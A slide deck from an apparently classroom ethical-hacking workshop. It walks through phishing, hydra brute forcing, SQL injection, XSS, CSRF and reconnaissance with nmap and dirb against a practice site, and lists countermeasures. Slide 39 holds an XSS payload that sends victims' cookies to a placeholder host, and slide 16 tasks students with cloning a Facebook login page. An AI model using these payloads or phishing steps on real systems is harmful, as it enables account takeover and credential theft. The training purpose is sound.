Ethical Hacking session conducted by Hritik Vijay on Sat 09 2019 in the FCC Heritage group.

1. Ethical Hacking
And
Online Privacy
By
Hritik Vijay

2. NOTE !
These slides are intended to be used
along with the respective servers
running.

3. Basics of HTML
<tag attribute=”value”>
</tag>
Eg:
<form action=”http://example.com/login”>
…..Other Tags……
</form>

5. Attack Defend

6. Meet Poppy
Checkout my
website at
SERVER0

7. Fishing Phishing

8. Normal Facebook Login

11. Poppy has added an option to delete your
entries !
Check it @ PHISHING_SERVER

12. Unicode Domain Names
URL: https://www.xn--80ak6aa92e.com/

13. Source: https://www.xudongz.com/blog/2017/idn-phishing/

15. ● Verify domain names.
● Use password managers.
● Type URLs of sensitive sites manually.

16. Hands On!
Create phishing page for
http://facebook.com/login

17. Man pages

18. $ man ls
$ man man
$ man hydra

19. Brute Force

20. Brute Force
A brute-force attack consists of an attacker
submitting many passwords or passphrases with
the hope of eventually guessing correctly.

22. Poppy is lazy. He keeps his password as
4 small alphabets.

23. Hands On !
Try brute forcing Poppy’s app.
LINK HERE
Username: poppy

24. Didn’t get the password?
Try hydra
$ man hydra

26. Captcha

27. Rate Limiting

28. Longer Passwords
LINK: Source https://howsecureismypassword.net/

29. SQL Injection
SQL injection is a web security vulnerability that allows an
attacker to interfere with the queries that an application makes
to its database.

30. Normal Login Flow
Login
User: Poppy
Pass: aaaa
Poppy’s data

31. SQL Injected Flow
Login
User: Poppy
Pass: a’ OR 1=1
Poppy’s data
Finding user poppy
where password is
a or 1=1

33. Hands On!
Poppy has changed his password to
something big.
Hack into Poppy’s account using SQL
Injection.

35. 1. Escape the input i.e. ‘ becomes ’
So, SELECT data FROM table where user=’poppy’ and
password=’a’ 1=1’
2. Use prepared statements i.e.
SELECT data FROM table where user=[1] and password=[2]
[1] = poppy
[2] = a’ 1=1

36. XSS: Cross Site Scripting
XSS enables attackers to inject client-side scripts
(javascript) into web pages viewed by other
users.
Can be used to capture session tokens.

38. Demo
Inject javascript in share list on Poppy’s
site to alert “HI”

39. Hands On !
● Turn on your server. LINK
● Inject the code
<img src=”” id=”payload” />
<script>
document.getElementById(“payload”).src=”http://YOUR_IP:
1338/xss_server.py?”+document.cookie;
</script>
● Wait for Poppy to access your share link.
● Login into Poppy’s account with his token.

41. Countermeasures
● Escape HTML strings i.e > becomes
&gt;
● Check carefully what and where you
are inserting input data.
● Use HttpOnly Cookies

42. CSRF: Cross Site Request Forgery
Cross-Site Request Forgery (CSRF) is
an attack that forces an end user to
execute unwanted actions on a web
application in which they're currently
authenticated.

43. Poppy Attacker
Check out cat videos!
http://ATTACKERSITE
Target
Website
UPDATE
Records

44. How to Update ?
● Create an invisible form
● Submit it automatically via JavaScript

46. Poppy is excited and have got
XSS fixed.
Also, he introduced a Delete
Account button.

47. Hands On !
You’re angry now.
Send Poppy a link which will delete his
account.

49. Countermeasures
● CSRF Tokens. (See Facebook)

50. Reconnaissance

51. Reconnaissance: Robots.txt
Robots.txt tell search engine what to index and
what not to.
It tells the attacker, what the author doesn’t want
to be indexed.

52. Reconnaissance: File Existence
A type of brute force attack in which the
attacker tries to find all the files present
on the server.
Tool: dirb

53. Reconnaissance: theHarvester
Tool to harvest some interesting
information about the website on the
internet.

54. Reconnaissance: nikto
Tool to automatically analyze a website for
interesting information.

55. Hands On !
● Find Poppy’s secret files (in robots.txt)
● Find Poppy’s hidden files (use dirb)
● Use theHarvester for facebook.com
with source google.

56. Deep Web
The deep web, invisible web, or hidden
web are parts of the World Wide Web
whose contents are not indexed by
standard web search engines.

58. PS: Poppy’s secret files were in deep
web

59. Ports

60. Ports are entry points of any country.
Ports are entry points of any service
exposed on the network.

61. Reconnaissance: Port Scan
Source: Hackinformer.com

62. Hands On !
Scan LINK Poppy’s website for open
ports. (nmap LINK)
Try to open one of the ports in the
browser.

63. Reconnaissance: Host Discovery
Try
nmap -sn LINK/24

64. Questions ?

65. Break !

67. HTTP ? HTTPS ? Why ?